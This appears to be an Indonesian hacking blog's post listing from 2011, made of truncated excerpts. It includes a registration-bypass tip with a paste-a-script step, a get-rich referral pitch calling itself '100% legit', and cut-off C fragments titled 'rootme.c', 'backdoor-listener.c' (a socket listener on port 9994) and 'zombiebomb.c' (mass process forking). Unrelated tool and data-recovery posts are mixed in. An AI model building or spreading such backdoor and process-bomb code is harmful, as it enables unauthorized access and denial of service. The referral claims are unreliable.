Pertama² coba register ke http://www.devilzc0de.org/
setelah register lakukan login tanpa melalui aktivasi dengan kata lain kita bisa memasukkan sembarang email (email fiktif)
setelah login kita akan diarahkan ke halaman http://www.devilzc0de.org/home.dc
copy paste script ini ke url browser anda
copy dan paste kan script ini ke browser anda pada halaman...
26 March 2011
Error On http://www.devilzc0de.org/home.dc <= maklum masih beta
15 March 2011
I will teach you who to make money on KUDOS FOR FREE!! PER 1 REFERRAL YOU GET 25$!!!
Can i join?Yes, Kudos is Open World Wide.
http://gifts.kudosnetwork.co.uk <---- Click to register.
What are the requirements?Complete an offer (free or paid)
Verified PayPal Account.
Is this a Scam?Nope! It's 100% legit.
And this is how it work.
Register at Kudos network.
Complete an offer.
Refer your friends and each of them complete an offer too.
The companies you and your friends completed offers pays Kudos Network and that money is...
rootme.c <= untested (masih ngantuk coyyyyy)
#include
#include
#include
#include
#include
int main(int argc, char *argv[]) {
if (argc < 4) {
fprintf(stderr, "%s: \n", argv[0]);
exit(1);
}
{
char *user = argv[1];
char *group = argv[2];
char *file = argv[3];
char buf[200];
stdout = freopen(file, "a", stdout);
/* set gid if necessary */
if (group) {
struct group *gr;
if ((gr = getgrnam(group)) == NULL) {
fprintf(stderr, "no such group %s - aborted",...
backdoor-listener.c
#include
#include
#include
#include
#include
int main() {
int fd;
struct sockaddr_in sa;
int port = 9994;
if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(1);
}
memset((char *) &sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_ANY);
sa.sin_port = htons(port);
if (bind(fd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(1);
}
if (listen(fd,...
zombiebomb.c
#include
#include
/** 23:30:37 @d4wfl1n> /bin/sh -c 'echo -n kill -STOP $$ \; ; echo -n sleep 1\; ; sleep 1000 & echo kill -KILL $! ; echo ; echo ; sleep 1000' | sh -x
*/
int main(int argc, char *argv[]) {
int i, c = (argc > 1 ? atoi(argv[1]) : 1024);
printf("will create %d zombies. press or \n", c);
getchar();
printf("creating %d zombies\n");
for (i = 0; i < c; i++) {
if (fork() == 0) {
exit(0);
}
}
printf("Press...
14 March 2011
brokyplo.pl

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use Getopt::Long;
use File::Slurp;
use Term::ANSIColor;
use Env;
my $script_version = '0.3.4';
# Set the main folder which contains all the saved data.
my $main_folder = "$HOME/.brokyplo/";
# This variable will contain the name of the company, for example
# Google Inc, Apple Inc, etc. $company_name_parsed...
Penetration Testing Biometric System
Untuk penjelasan mengenai skema dan proses kerjanya bisa didownload di sini
GRA...
13 March 2011
Mengembalikan Data Yang Terhapus Dengan Steller Phoenix Windows Data Recovery

Setelah banyak software yang dibahas tentang bagaimana cara mengembalikan data yang terhapus atau hilang dari harddisk dan berbagai macam media penyimpanan lainnya. Dalam artikel kali ini akan dibahas utility yang menarik dari software-software recovery sebelumnya, Stellar Phoenix Windows Data Recovery salah satu utility yang dapat mengembalikan file tanpa...